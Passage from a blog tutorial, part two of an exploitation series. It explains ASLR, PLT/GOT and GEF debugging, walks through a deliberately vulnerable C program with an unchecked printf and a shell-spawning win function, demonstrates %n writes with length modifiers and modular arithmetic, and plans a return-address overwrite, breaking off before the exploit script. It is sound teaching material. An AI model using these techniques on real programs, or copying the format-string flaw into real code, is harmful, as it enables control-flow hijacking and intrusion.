The Rocky Road To Pwn

The Rocky Road To Pwn - Part Two

Relocation(ASLR), GEF, and Data Manipulation With Format Print

26 Aug 2024

Part One: Format Print Basic and Elementary Format Print Attack
Part Two: Relocation(ASLR) and Data Manipulation With Format Print
Part Three: A real CTF challenge

In the second part of our Pwn trilogy, we will explore the format print function further. Part one covered the format print function from the C standard library, basic concepts of the format string attack and some information leak techniques. Here, we will delve deeper into the format print function and demonstrate how to manipulate data using a user-controllable format string.

Indirect memory writing

Like indirect memory reading discussed in part one, indirect memory writing allows arbitrary access to a foreign entity. Instead of dumping the memory chunk at an arbitrary address, indirect memory writing overrides data at the designated address in a controlled manner. The ability to modify arbitrary data in the target process’s virtual memory is crucial, as it is a critical step in taking over the target process’s control flow.

Indirect memory writing shares some analogies to indirect memory reading. In indirect memory writing, the target address is loaded onto the process’s stack, treated as a pointer, and replaced the dereferenced virtual memory location with an integer value. Unlike indirect memory reading, which retrieves an arbitrary-sized segment from the target address, indirect memory writing only overwrites the target address with a fixed-sized integer determined by the length modifier of the conversion specifier in the format string. The following example demonstrates how to perform indirect memory writing.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <alloca.h>

#define BUFSIZE 32

static void __attribute__((used)) win() {
	puts("Awesome! Enjoy the shell.");
	execve("/bin/sh",NULL,NULL);
	perror("evecve");
}

void process_input(char *input) {
	while(fgets(input,BUFSIZE,stdin)) {
		if(strlen(input)<=1) break;
		printf(input);
		memset(input,0,BUFSIZE);
	}
	puts("See you next time! Bye.");

}

int main() {
	setbuf(stdin,NULL);
	setbuf(stdout,NULL);
	char *buf = alloca(BUFSIZE);
	memset(buf,0,BUFSIZE);
	process_input(buf);
	return EXIT_SUCCESS;
}

This example differs from all the previous examples from part one in that it contains more functions than just a single main function. There are two additional functions: process_input, which processes the user input and faces a vulnerability of user-controlled format strings, and win, which is never called but provides an interactive shell to the user. We aim to take over the program’s control flow and call the win function. As usual, we’ll start by disassembling each function and conducting a brief analysis.

00000000000011b9 <win>:
    11b9:       55                      push   %rbp
    11ba:       48 89 e5                mov    %rsp,%rbp
    11bd:       48 8d 05 40 0e 00 00    lea    0xe40(%rip),%rax        # 2004 <_IO_stdin_used+0x4>
    11c4:       48 89 c7                mov    %rax,%rdi
    11c7:       e8 64 fe ff ff          call   1030 <puts@plt>
    11cc:       ba 00 00 00 00          mov    $0x0,%edx
    11d1:       be 00 00 00 00          mov    $0x0,%esi
    11d6:       48 8d 05 41 0e 00 00    lea    0xe41(%rip),%rax        # 201e <_IO_stdin_used+0x1e>
    11dd:       48 89 c7                mov    %rax,%rdi
    11e0:       e8 bb fe ff ff          call   10a0 <execve@plt>
    11e5:       48 8d 05 3a 0e 00 00    lea    0xe3a(%rip),%rax        # 2026 <_IO_stdin_used+0x26>
    11ec:       48 89 c7                mov    %rax,%rdi
    11ef:       e8 bc fe ff ff          call   10b0 <perror@plt>
    11f4:       90                      nop
    11f5:       5d                      pop    %rbp
    11f6:       c3                      ret

The win function is a concise example of invoking the execve syscall in assembly. This invocation occurs through the libc wrapper for execve, a userspace procedure call. The libc wrapper manages the syscall calling convention. Additionally, the libc section and its wrappers may be relocated randomly due to address space layout randomization (ASLR).

A shortcode like this to launch an interactive shell is called a shellcode. Although we don’t need to assemble an assembly payload to invoke the execve syscall in this example, it’s beneficial to acquire such knowledge as there may not be a win function in subsequent challenges, requiring a handcraft shellcode fabrication.

00000000000011f7 <process_input>:
    11f7:       55                      push   %rbp
    11f8:       48 89 e5                mov    %rsp,%rbp
    11fb:       48 83 ec 10             sub    $0x10,%rsp
    11ff:       48 89 7d f8             mov    %rdi,-0x8(%rbp)
    1203:       eb 39                   jmp    123e <process_input+0x47>
    1205:       48 8b 45 f8             mov    -0x8(%rbp),%rax
    1209:       48 89 c7                mov    %rax,%rdi
    120c:       e8 2f fe ff ff          call   1040 <strlen@plt>
    1211:       48 83 f8 01             cmp    $0x1,%rax
    1215:       76 46                   jbe    125d <process_input+0x66>
    1217:       48 8b 45 f8             mov    -0x8(%rbp),%rax
    121b:       48 89 c7                mov    %rax,%rdi
    121e:       b8 00 00 00 00          mov    $0x0,%eax
    1223:       e8 48 fe ff ff          call   1070 <printf@plt>
    1228:       48 8b 45 f8             mov    -0x8(%rbp),%rax
    122c:       ba 20 00 00 00          mov    $0x20,%edx
    1231:       be 00 00 00 00          mov    $0x0,%esi
    1236:       48 89 c7                mov    %rax,%rdi
    1239:       e8 42 fe ff ff          call   1080 <memset@plt>
    123e:       48 8b 15 2b 2e 00 00    mov    0x2e2b(%rip),%rdx        # 4070 <stdin@GLIBC_2.2.5>
    1245:       48 8b 45 f8             mov    -0x8(%rbp),%rax
    1249:       be 20 00 00 00          mov    $0x20,%esi
    124e:       48 89 c7                mov    %rax,%rdi
    1251:       e8 3a fe ff ff          call   1090 <fgets@plt>
    1256:       48 85 c0                test   %rax,%rax
    1259:       75 aa                   jne    1205 <process_input+0xe>
    125b:       eb 01                   jmp    125e <process_input+0x67>
    125d:       90                      nop
    125e:       48 8d 05 c8 0d 00 00    lea    0xdc8(%rip),%rax        # 202d <_IO_stdin_used+0x2d>
    1265:       48 89 c7                mov    %rax,%rdi
    1268:       e8 c3 fd ff ff          call   1030 <puts@plt>
    126d:       90                      nop
    126e:       c9                      leave
    126f:       c3                      ret

The process_input function in assembly is longer than the win function. Although the source code of the process_input function is short, it consists of multiple procedure calls to the C standard library (libc). Preparing arguments for the procedure calls to meet the calling convention costs a few instructions. You may have also noticed the specific ending @plt in the procedure calls to the libc, such as printf@plt. Such notations come with the libc being dynamically linked to this program, and the program’s executable is ready for ASLR (Address Space Layout Randomization).

Address space layout randomization

The libc provides a shared object file mapped into most Linux processes if the process’s executable is dynamically linked. When ASLR is enabled on computer systems, the executable and the shared object are randomly mapped into the target process’s virtual memory (VM) to prevent adversaries from controlling the program’s control flow. This technique, called relocation, requires the compiler to avoid using absolute addresses in the machine-language instructions it generates. Instead, the compiler uses the relative addressing mode supported by most x86 instructions, with instruction pointer relative addressing being the most preferred. When relocation happens, components from the exact file are mapped to a random VM location, with internal offsets preserved. Thanks to the instruction pointer relative addressing, relocation does not break the references to other instructions and global static constants and variables originating from the exact file. Binaries capable of relocation are called position-independent code (PIC) or position-independent executable (PIE), which are fundamental to ASLR.

Process Virtual Memory Layout w/ ASLR 

----------------------- 0x0000000000000000

+---------------------+
| Main Executable     |
|                     |
| Randomized          |
| Address Range       |
|                     |
+---------------------+

+---------------------+
| Shared Libraries    |
|                     |
| Randomized          |
| Address Range       |
|                     |
+---------------------+

+---------------------+
| Heap                |
|                     |
| Randomized          |
| Address Range       |
|                     |
+---------------------+ brk

+---------------------+
| Memory Mapped Files |
|                     |
| Randomized          |
| Address Range       |
|                     |
+---------------------+

+---------------------+
| Stack               |
|                     |
| Randomized          |
| Address Range       |
|                     |
+---------------------+

----------------------- 0x7FFFFFFFFFFFFFFF

+---------------------+
| Kernel Space        |
|                     |
| Randomized          |
| Address Range       |
|                     |
+---------------------+

The instruction pointer relative addressing helps a PIC (Position-Independent Code) keep internal references. However, cross-references to other files would break, as different files are supposed to relocate to arbitrary virtual memory locations. Consequently, PIC-enabled executables usually come with the procedure linkage table (PLT) and the global offset table (GOT).

===========================
|    Main Executable      |
| (Randomly mapped in VM) |
|                         |
|*-----------------------*|
||Read-and-Execute Pages ||
||-----------------------||
||   PLT                 ||
||+---------------------+||
||| 1040 <strlen@plt>   |||
||| 1050 <fgets@plt>    |||
||| 1060 <memset@plt>   |||
||| 1070 <printf@plt>   |||  <-- Wrapper function for printf
||+---------------------+||
||   Functions           ||
||+---------------------+||   
|||process_input        ||| 
|||  ...                |||
|||  call printf@plt    |||  <-- call 1070 <printf@plt>
|||  ...                |||
||+---------------------+||
||+---------------------+||   
|||main                 ||| 
|||  ...                |||
|||  call process_input |||  
|||  ...                |||
||+---------------------+||
|*-----------------------*|
|                         |
|*-----------------------*|
||  Read-and-Write Pages ||
||-----------------------||
||   GOT                 ||
||+---------------------+||   
||| 2040 <.got.plt>     |||  
||| 2048 <.got.plt+8>   |||
||| ...                 |||
||| 2060 <.got.plt+32>  |||  <-- Address of printf in libc
||| ...                 |||   (Initially points to resolver)
||+---------------------+||
|*-----------------------*|
===========================

The PLT comprises wrapper functions that resolve or initiate the corresponding GOT entry. The GOT is mainly an array of function pointers, where each entry refers to a procedure in a shared object file.

The wrapper functions in PLT and the function pointers in GOT form a bijective relation. Each wrapper function always attempts to retrieve the function pointer and then yields the control flow to the designated address to which the function pointer refers. If the GOT entry is uninitialized, the wrapper function will initialize it with a particular record in the GOT, whose initialization is guaranteed when loading the shared object file into virtual memory.

+-------------------+   
|process_input      | 
|  ...              |
|  call printf@plt -|--
|  ...              | |
+-------------------+ |
+-------------------+ | 
|printf@plt:      <-|--
|  push 0xfcc(%rip) |     # .got.plt+8
|  jmp *0xfe4(%rip)=|===- # .got.plt+32
|  nopl 0x0(%rax)   |  ||
+-------------------+ l||j
+-------------------+ o||u
|got:               | a||m
| ...               | d||p
| 2060 <.got.plt+32>|<-||
| ...               |   |
+-------------------+   |
+-------------------+   |
|printf@libc:     <-|----
| ...               |
+-------------------+

With the instruction pointer relative addressing, PLT and GOT help shared libraries and executables overcome relocations, aiming to improve binary security.

Address Space Layout Randomization (ASLR) aggrandizes the frustration for attackers to exploit memory corruption. ASLR changes the location of executable code, data, and structures in a process’s virtual memory, making it difficult for attackers to predict their exact locations. Without ASLR, attackers could analyze the binary and linked libraries to find these critical details. Understanding ASLR statically is essential, but testing it on a live system is also valuable.

GDB Enhanced Features (GEF)

We always use the GNU Project debugger (GDB) to analyze the inner workings of the example program. This time, we are using the GDB Enhanced Features (GEF) plugin, which significantly enhances GDB’s capabilities when navigating lower-level systems. GEF introduces essential features such as interpreting and dereferencing memory chunks, reconstructing data structures, automatically detecting use-after-free (UAF) vulnerabilities, and identifying vulnerable strings. GEF also retains original GDB features like disassembling code, displaying information, and, most importantly, setting breakpoints with or without conditions. We begin by inspecting the relocated function process_input and setting a breakpoint where it calls the printf procedure.

gef➤  disassemble process_input
Dump of assembler code for function process_input:
   0x00005ce6f938a1f7 <+0>:     push   %rbp
   0x00005ce6f938a1f8 <+1>:     mov    %rsp,%rbp
   0x00005ce6f938a1fb <+4>:     sub    $0x10,%rsp
......
   0x00005ce6f938a21e <+39>:    mov    $0x0,%eax
   0x00005ce6f938a223 <+44>:    call   0x5ce6f938a070 <printf@plt>
   0x00005ce6f938a228 <+49>:    mov    -0x8(%rbp),%rax
......
   0x00005ce6f938a26d <+118>:   nop
   0x00005ce6f938a26e <+119>:   leave
   0x00005ce6f938a26f <+120>:   ret
End of assembler dump.
gef➤  b *(process_input+44)
Breakpoint 1 at 0x5ce6f938a223: file poc.c, line 18.

The disassembled function process_input looks indistinguishable statically and under runtime in the debugger, except the instructions are mapped to high memory addresses, resulting from relocation together with ASLR. We could utilize the information-displaying command to inspect the memory mappings in GDB. The Linux kernel also provides a system API under procfs for such information.

gef➤  info proc mappings
process 762008
Mapped address spaces:

          Start Addr           End Addr       Size     Offset  Perms  objfile
      0x5ce6f9389000     0x5ce6f938a000     0x1000        0x0  r--p   /mnt/playground/workspace/poc
      0x5ce6f938a000     0x5ce6f938b000     0x1000     0x1000  r-xp   /mnt/playground/workspace/poc
      0x5ce6f938b000     0x5ce6f938c000     0x1000     0x2000  r--p   /mnt/playground/workspace/poc
      0x5ce6f938c000     0x5ce6f938d000     0x1000     0x2000  r--p   /mnt/playground/workspace/poc
      0x5ce6f938d000     0x5ce6f938e000     0x1000     0x3000  rw-p   /mnt/playground/workspace/poc
      0x7797282df000     0x7797282e2000     0x3000        0x0  rw-p
      0x7797282e2000     0x779728306000    0x24000        0x0  r--p   /usr/lib/libc.so.6
      0x779728306000     0x779728461000   0x15b000    0x24000  r-xp   /usr/lib/libc.so.6
      0x779728461000     0x7797284b6000    0x55000   0x17f000  r--p   /usr/lib/libc.so.6
      0x7797284b6000     0x7797284ba000     0x4000   0x1d3000  r--p   /usr/lib/libc.so.6
      0x7797284ba000     0x7797284bc000     0x2000   0x1d7000  rw-p   /usr/lib/libc.so.6
      0x7797284bc000     0x7797284c6000     0xa000        0x0  rw-p
      0x779728515000     0x779728516000     0x1000        0x0  r--p   /usr/lib/ld-linux-x86-64.so.2
      0x779728516000     0x77972853d000    0x27000     0x1000  r-xp   /usr/lib/ld-linux-x86-64.so.2
      0x77972853d000     0x779728548000     0xb000    0x28000  r--p   /usr/lib/ld-linux-x86-64.so.2
      0x779728548000     0x77972854a000     0x2000    0x32000  r--p   /usr/lib/ld-linux-x86-64.so.2
      0x77972854a000     0x77972854c000     0x2000    0x34000  rw-p   /usr/lib/ld-linux-x86-64.so.2
      0x7ffd4e1c0000     0x7ffd4e1e1000    0x21000        0x0  rw-p   [stack]
      0x7ffd4e1e4000     0x7ffd4e1e8000     0x4000        0x0  r--p   [vvar]
      0x7ffd4e1e8000     0x7ffd4e1ea000     0x2000        0x0  r-xp   [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0  --xp   [vsyscall]
gef➤

The information-displaying command reveals the memory mappings of the example program at runtime. In this mapping, sections from the executable are relocated at memory address 0x5ce6f9389000, while the libc sections are relocated at 0x7797282e2000. The program call stack is relocated at memory address 0x7ffd4e1e1000, and the shared library loader, ld-linux-x86-64.so.2, is relocated at 0x779728515000. This loader helps to load shared libraries, such as the libc and others, during runtime. Additionally, the function process_input is relocated at 0x00005ce6f938a1f7, offsetting the start of the relocated executable sections by 0x11f7. This offset is identical to the static offset shown by objdump, advocating that internal offsets are preserved during relocation.

Understanding how Address Space Layout Randomization (ASLR) works helps us gain control of the program’s flow to call the win function. Utilizing the knowledge from the previous section about stack frames, we can substitute the return address of the current stack frame with the address of the win function. This modification should cause the program to transfer control to the win function when the process_input function returns. As usual, we need to analyze the stack structure when the program is about to call printf, where our breakpoint is set. Therefore, we resume the program’s execution and wait for it to reach our breakpoint.

gef➤  c
Continuing.

Breakpoint 1, 0x00005ce6f938a223 in process_input (input=0x7ffd4e1df9b0 'A' <repeats 32 times>)


gef➤  context stack
──────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007ffd4e1df990│+0x0000: 0x00007ffd4e1dfb08  →  0x00007ffd4e1e066c  →  "/mnt/playground/workspace/poc"  ← $rsp
0x00007ffd4e1df998│+0x0008: 0x00007ffd4e1df9b0  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
0x00007ffd4e1df9a0│+0x0010: 0x00007ffd4e1df9f0  →  0x0000000000000001    ← $rbp
0x00007ffd4e1df9a8│+0x0018: 0x00005ce6f938a305  →  <main+149> mov $0x0, %eax
0x00007ffd4e1df9b0│+0x0020: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    ← $rcx, $rdx, $rdi
0x00007ffd4e1df9b8│+0x0028: "AAAAAAAAAAAAAAAAAAAAAAA"
0x00007ffd4e1df9c0│+0x0030: "AAAAAAAAAAAAAAA"
0x00007ffd4e1df9c8│+0x0038: 0x0041414141414141 ("AAAAAAA"?)
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Mastering the stack in GEF is straightforward, providing a command context to access common system data structures, syscall traces, and register values. In the process_input function, the stack frame starts at 0x00007ffd4e1df9a8, where the return address is located. The stack frame extends to 0x00007ffd4e1df990, which is pointed to by the stack pointer. Next to the return address, at 0x00007ffd4e1df9a0, is the saved stack base of the main function, the caller function of process_input. The compiler reserves two octlets for local variables due to alignment. Yet, only the octlet at 0x00007ffd4e1df998 is utilized to store the input buffer address obtained from the parameter of the process_input function.

GEF decodes the stack variables and shows their contents. The parameter input stores its value to a local stack variable at address 0x00007ffd4e1df998, which is the location of the input buffer, another consecutive buffer on the stack. The input buffer is created using ‘alloca’ in the ‘main’ function with a size of 32. Therefore, the input buffer is located at addresses 0x00007ffd4e1df9b0 to 0x00007ffd4e1df9d0, within the stack frame of the main function. The input buffer is filled with A, which the user provided.

Understanding the arrangement of stack frames is pivotal for crafting an exploit that can effectively commandeer a program’s control flow and execute the win function. An approach to accomplishing this involves intricately manipulating the return address on a specific stack frame, thereby rerouting the program’s control flow to the altered address upon returning the corresponding procedure call. Notably, this maneuver can be executed by leveraging a furtive conversion specifier in format printing to manipulate the program’s memory. Meet the cursed conversion specifier that overwrites memory data without boundaries.

The cursed conversion specifier

The cursed conversion specifier n is a holdover from an era when computer memory and processing power were limited. In the printf function, the n specifier stores the number of characters written up to its occurrence in a variable, assuming the variable’s type is an integer. This count includes visible and invisible characters, such as alphanumeric, special characters, and bytes beyond printable ASCII characters. Like other placeholders in the format string, placeholders with n as the conversion specifier can be positioned using parameters.

[skid.t@BlackArch workspace]$ cat cursed-specifier.c
#include <stdio.h>

int main() {
	int l=0,m=0,n=0,o=0,p=0;
	printf("Black Hat, out there in the cold%n\n%n", &l, &m);
	printf("Hacking%2$n websites for control%1$n\n", &n, &o);
	printf("Can you crack me?\n%1337c%n\n", ' ', &p);
	printf("l=%d m=%d n=%d o=%d p=%d\n",l,m,n,o,p);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g cursed-specifier.c -o cursed-specifier
[skid.t@BlackArch workspace]$ ./cursed-specifier
Black Hat, out there in the cold
Hacking websites for control
Can you crack me?

l=32 m=33 n=28 o=7 p=1355

When using the n conversion specifier in a printf format string, the placeholder is not replaced with anything in the resulting string; it simply gets removed. For example, in the second printf format string from the example program cursed-specifier.c, the placeholder %2$n after the word Hacking is omitted in the output string.

Placeholders with the n conversion specifier follow the sequential order, matching the corresponding arguments of the format print function. As a result, the variable l stores the length of the first line output without the newline character, while the variable m stores the length with the newline character. Therefore, the variables l and m differ by one.

Placeholders with the n conversion specifier can also be parameter-positioned. The second printf format string elucidates this concept, as %2$n refers to the variable o, while n is referenced by %1$n.

The n conversion specifier counts all characters in the resulting string until its occurrence. This means placeholders with a field width specifier in the format string will be expanded before counting. In the third printf, the single space character is developed into a sequence of white spaces in the resulting string, which increases the value in p, counting the length of the current line. This is useful when we have limited space for the format string but still want to load a large integer into the target position. Another helpful trick is to use length modifiers when you only want to overwrite one or two bytes, leaving the remaining bytes of a four-byte integer untouched instead of overwriting them with leading zeros.

The length modifiers introduce constraints on the bit width, determining how many bytes the n conversion specifier will overwrite at the specified location. This feature is essential in binary exploitation involving format string vulnerabilities. Before discussing overwriting with bit width constraints, it’s critical to understand the issue of integer overflow, especially when the resulting string is too long and an integer overflow occurs, with or without using a length modifier. The example in length-modifier.c demonstrates this concept.

[skid.t@BlackArch workspace]$ cat length-modifier.c
#include <stdio.h>

int main() {
	int l=0,m=0,n=0,o=0,p=0,q=0,r=0,s=0,t=0;
	printf("Black Hat, working for the Chinese\n%hn%65501c%hn\n%hn",&l,' ',&m,&n);
	printf("With twitchy fingers on flashing keys\n%hhn%218c%hhn\n%hhn",&o,' ',&p,&q);
	printf("Can you spoof me?\n%2147483629c%n\n%n\n%n",' ',&r,&s,&t);
	printf("\nl=%d m=%d n=%d\n",l,m,n);
	printf("o=%d p=%d q=%d\n",o,p,q);
	printf("r=%d s=%d t=%d\n",r,s,t);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g length-modifier.c -o length-modifier
[skid.t@BlackArch workspace]$ ./length-modifier | awk 'NF'
Black Hat, working for the Chinese
With twitchy fingers on flashing keys
Can you spoof me?
l=35 m=0 n=1
o=38 p=0 q=1
r=2147483647 s=-1 t=-1

In the program length-modifier, we effectively utilize the NF expression with awk as a filter to eliminate lengthy lines consisting only of blank spaces from the output. Upon applying the filter, it becomes evident that variable l precisely represents the line length before the blank space line resulting from a large length modifier. Moreover, variable m unequivocally demonstrates a value of 0 following an integer overflow on an unsigned short. The equation 35+65501=65536 defines the maximum value of a 16-bit unsigned short integer as 2^16-1=65535. It is important to emphasize that despite the printf manual’s assertion that “a subsequent n conversion corresponds to a pointer to a short argument” for the length modifier h (representing half), the negative value in variable m did not undergo sign extension. This is due to the %hn placeholder only writing the lower 2 bytes of the 4-byte integer m, leading to truncating the number 65536 into 0 before being written to the destination variable. This occurs as 65536 requires at least 17 bits for storage, and its lower 16 bits are all zero.

The hh length modifier (representing half-half) operates similarly to the h modifier, albeit constraining the bit width to one byte instead of two. In contradiction to the manual, the hh modifier treats the target address as a pointer to an 8-bit unsigned integer. Notably, variable o represents the length of the second line in the output, and variable p asserts the value of 0, given that 38+218=256 and values range from 0 to 255 for 8-bit unsigned integers.

The third line of the output also exemplifies an integer overflow without a length modifier. In contrast to the turnover observed with a length modifier, the format print function decisively sets variables s and t to a value of -1, which typically indicates a failure. This enhancement in glibc 2.37 was introduced in conjunction with the buffer implementation for printf. In previous versions of glibc, the format print function simply terminated its execution and returned control flow to its caller with the already printed portion preserved. Analogous to other errors, the format print function assigns the global error variable errno to EOVERFLOW when an integer overflow of the counter variable done occurs.

The turnover enables the lower values to be written without utilizing positional parameters of placeholders in ascending order within one format string. This is beneficial as the format string buffer may have limitations in length, and the absence of positional parameters helps minimize the size of the attack payload that needs to be loaded into the format string buffer. This modus operandi is akin to modular arithmetic in mathematics, where congruence is employed to govern the extent of decrease between two placeholders with the n conversion specifier.

The Congruence

Congruence in modular arithmetic, a branch of mathematics, is both profound and fascinating. While we won’t delve deeply into the complexities of mathematics, we can pragmatically utilize a few inferences of congruence. In the example program congruence, we will demonstrate how to decrease by one without subtraction.

[skid.t@BlackArch workspace]$ cat congruence.c
#include <stdio.h>

int main() {
	int l=0,m=0,n=0,p=0;
	printf("Black Hat, don't let them put you in the light\n%hhn%255c%hhn\n",&l,' ',&m);
	printf("Never give in: just fight!\n%hn%65535c%hn\n",&n,' ',&p);
	printf("l=%d m=%d n=%d p=%d",l,m,n,p);
}
[skid.t@BlackArch workspace]$ gcc -O0 -g congruence.c -o congruence
[skid.t@BlackArch workspace]$ ./congruence | awk 'NF'
Black Hat, don't let them put you in the light
Never give in: just fight!
l=47 m=46 n=27 p=26

The example program congruence illustrates decreasing by one in different least residue systems. As discussed earlier, the counter turns over to zero when the number of printed characters exceeds the maximum value of the corresponding datatype’s length modifier.

For a 16-bit unsigned integer with the half-length modifier, the maximum value is 65535; for an 8-bit unsigned integer with the half-half modifier, the maximum value is 255. The former ranges from 0 to 65535, and the latter from 0 to 255. Both form the least residue system individually in modular arithmetic.

Furthermore, there are 65536 numbers in the value range of a 16-bit unsigned integer, as 2^16=65536. Similarly, there are 256 numbers in the value range of an 8-bit unsigned integer given 2^8=256. The number of values in the discrete value range is the cardinality of the corresponding least residue system.

We can reduce a value by subsequent incrementations because values in the least residue system always return to 0 when they exceed the maximum value. There is always precisely one value in the least residue system congruent to an arbitrary positive integer. When an arbitrary integer is divided by the cardinality of a least residue system in modular arithmetic, the remainder is always in the least residue system. To reduce a value by one via increments in the least residue system, one can always increase the value by the cardinality minus one.

In the example program congruence, we reduce the value from 47 to 46 by printing 255 empty spaces, where 255 is the cardinality of the least residue system modulo 256 minus one. Also, we reduce the value from 27 to 26 by printing 65535 empty spaces, where 65535 is the cardinality of the least residue system modulo 65536 minus one.

The example program congruence-2 demonstrates decreasing beyond one in format printing.

[skid.t@BlackArch workspace]$ cat congruence-2.c
#include <stdio.h>

void fmt_print(const char *fmt) {
	int x=0,y=0;
	printf(fmt,&x,' ',&y);
	printf("x=%02d, y=%02d\n",x,y);
}

int main() {
	fmt_print("Black Hat, always trying to p0wn,\n%hhn%254c%hhn\n");
	fmt_print("Social engineering with a phone,\n%hn%65534c%hn\n");
	fmt_print("Can you phish me?\n%hhn%251c%hhn\n");
	fmt_print("Black Hat, with your buffer overflows\n%hn%65531c%hn\n");
	fmt_print("Waiting for someone to hit one\n%hhn%246c%hhn\n");
	fmt_print("Can you probe me?\n%hn%65526c%hn\n");
	fmt_print("Black Hat, do you do this for pure knowledge?\n%hhn%236c%hhn\n");
	fmt_print("They opened the file! Too bad: they're pledged\n%hn%65516c%hn\n");
}
[skid.t@BlackArch workspace]$ gcc -O0 -g congruence-2.c -o congruence-2
[skid.t@BlackArch workspace]$ ./congruence-2 | awk 'NR%3==1{printf "%-50s # ", $0};NR%3==0'
Black Hat, always trying to p0wn,                  # x=34, y=32
Social engineering with a phone,                   # x=33, y=31
Can you phish me?                                  # x=18, y=13
Black Hat, with your buffer overflows              # x=38, y=33
Waiting for someone to hit one                     # x=31, y=21
Can you probe me?                                  # x=18, y=08
Black Hat, do you do this for pure knowledge?      # x=46, y=26
They opened the file! Too bad: they're pledged     # x=47, y=27

The example program congruence-2 illustrates how to decrease a number by two, five, ten, and twenty in different least residue systems. Just like subtracting one, you can consistently achieve the same result by adding the modulus minus the amount to decrease. For example, 254 is equivalent to 256-2, and in modular arithmetic under modulo 256, 2 and 254 are mutual additive inverses, as their sum results in 0. Similarly, in the least residue systems modulo 65536, 65534 and 2 are mutual additive inverses. Generally, you can add the additive inverse of that amount to the current value to decrease a value by a certain amount. We only consider the two least residue systems when exploiting format print functions. Therefore, finding the additive inverses only involves subtracting the amount to reduce from two possible moduli, 256 and 65536.

In contrast to previous programs in the congruence section, the example program congruence-2 uses a wrapper function for formatting and printing. The wrapper function includes two local variables, x and y, which store the number of characters printed before and after a long empty line for each format string. The wrapper function then prints the values of x and y, printing three lines: the line before the long empty line in the format string, the long empty line, and the line displaying the values of x and y. Based on this, we utilize a new awk expression to manipulate the three-line structure, removing the long empty line and joining the first and third lines with a hash symbol in between. This new awk expression helps provide a clear view of the value differences before and after applying the additive inverses.

With our understanding of the cursed conversion specifier n and congruence, we are close to finishing our exploration of indirect memory writing. Let’s recall the Genesis example of the indirect memory writing section. We found a vulnerability in the process_input function, which allows a user-controlled format string, and we aim to hijack the program’s control flow to execute the win function. However, due to the Address Space Layout Randomization (ASLR), we don’t know the exact runtime address of the win function. Therefore, we must calibrate our cyber warfare before launching it at the target function.

Hold On

In the previous sections, we discussed Address Space Layout Randomization (ASLR), which randomizes the memory layout, the conversion specifier n, which can be used to overwrite memory values, and congruence, which enhances memory overwriting flexibility. We also explored a user-controlled format string vulnerability in the process_input function. In the Genesis example of part two(the indirect memory writing section), we discovered a method to take control of the program’s flow by overwriting the return address of the stack frame of the process_input function with the address of the win function. However, due to ASLR, the exact address of the win function is uncertain. To proceed, we need to find a way to leak information about the runtime relocation and determine the runtime address of the win function. Fortunately, the process_input function allows us to repeatedly trigger the format print function with different payloads, facilitating leaking, calibrating, and executing the final exploit.

Before overwriting the return address on the stack frame of the process_input function, we can obtain the original return address, which typically points to the next instruction after the call instruction in the calling function (in this case, main). By disassembling the main function, we can determine that the instruction following the call instruction is the mov instruction at address 1305. Therefore, with the retrieved return address from the process_input function, we can calculate the base address of the relocated section by interpreting the return address as an 8-byte little-endian unsigned integer and subtracting 0x1305 from it.

0000000000001270 <main>:
    1270:	55                   	push   %rbp
    1271:	48 89 e5             	mov    %rsp,%rbp
    1274:	48 83 ec 10          	sub    $0x10,%rsp
    1278:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
......
    12fd:	48 89 c7             	mov    %rax,%rdi
    1300:	e8 f2 fe ff ff       	call   11f7 <process_input>
    1305:	b8 00 00 00 00       	mov    $0x0,%eax
......
    1317:	74 05                	je     131e <main+0xae>
    1319:	e8 32 fd ff ff       	call   1050 <__stack_chk_fail@plt>
    131e:	c9                   	leave
    131f:	c3                   	ret

There is one more thing left before implementing the exploit script. This section is under “indirect memory write” rather than “direct memory write”, where the cursed conversion specifier n requires an aligned pointer to dereference before it can overwrite the target address. That is, we must acquire the runtime address of the return address on the stack frame of the process_input function. Fortunately, the stack frames usually store the saved value of the RBP register from their caller’s stack frame, which reveals the relocated address of the program stack. By comparing the caller’s stack frame with the current stack frame, we can apply a static offset to the saved RBP value to calculate the runtime address of the return address on the current stack frame. The offset value, determined from either statical or runtime analyses, suggests that it should be 0x48. Given that the program stack grows from higher to lower addresses, the runtime address of the return address on the current stack frame can be calculated by subtracting the saved RBP value from the offset value. Therefore, we now have the value to overwrite and the address to apply the overwrite.

Stack Pointer(RSP): ┌───────────────────────┐
     0x7ffd4e1df990 │      unused           │      ┯
                    ├───────────────────────┤      │
     0x7ffd4e1df998 │ input(pointer to buf) │ stack frame
 Base Pointer(RSP): ├───────────────────────┤      of
     0x7ffd4e1df9a0 │ saved RBP(main's RBP) │ process_input
                    ├───────────────────────┤      │
     0x7ffd4e1df9a8 │     return address    │      ┷
                    ├───────────────────────┤
     0x7ffd4e1df9b0 │     input buffer      │      ┯
                    ├───────────────────────┤      │
     0x7ffd4e1df9b8 │  input buffer(cont.)  │      │
                    ├───────────────────────┤      │
     0x7ffd4e1df9c0 │  input buffer(cont.)  │      │
                    ├───────────────────────┤      │
     0x7ffd4e1df9c8 │  input buffer(cont.)  │      │
                    ├───────────────────────┤ stack frame
     0x7ffd4e1df9d0 │                       │      of
                    ┆                       ┆     main
                    ┊    local variables    ┊      │
                    ┆                       ┆      │
                    ├───────────────────────┤      │
     0x7ffd4e1df9e8 │ stack canary (cookie) │      │
        Main's RBP: ├───────────────────────┤      │
     0x7ffd4e1df9f0 │ dummy saved RBP (0x1) │      │
                    ├───────────────────────┤      │
     0x7ffd4e1df9f8 │     return address    │      ┷
                    └───────────────────────┘

We are fully prepared for the format string attack. We can bypass ASLR, overwrite memory with a user-controlled format string, and execute a provided “win” function. All the necessary components are in place; it’s time to proceed. In the following section, we will create the exploit script and break it down.

Talk is cheap, show me the code

Building and using cyber warfare against a target program is always intriguing. As mentioned in the heading, the lectures have concluded, and it’s time to move on to the practical work. We will write a script using Python and the pwnlib. We have selected version 4.13.0 for the pwnlib and version 3.12.4 for Python. We will not reiterate the exploit strategy here, as it has been extensively discussed in previous sections. Here is the source code for the vulnerable function process_input for your reference.

#define BUFSIZE 32

void process_input(char *input) {
	while(fgets(input,BUFSIZE,stdin)) {
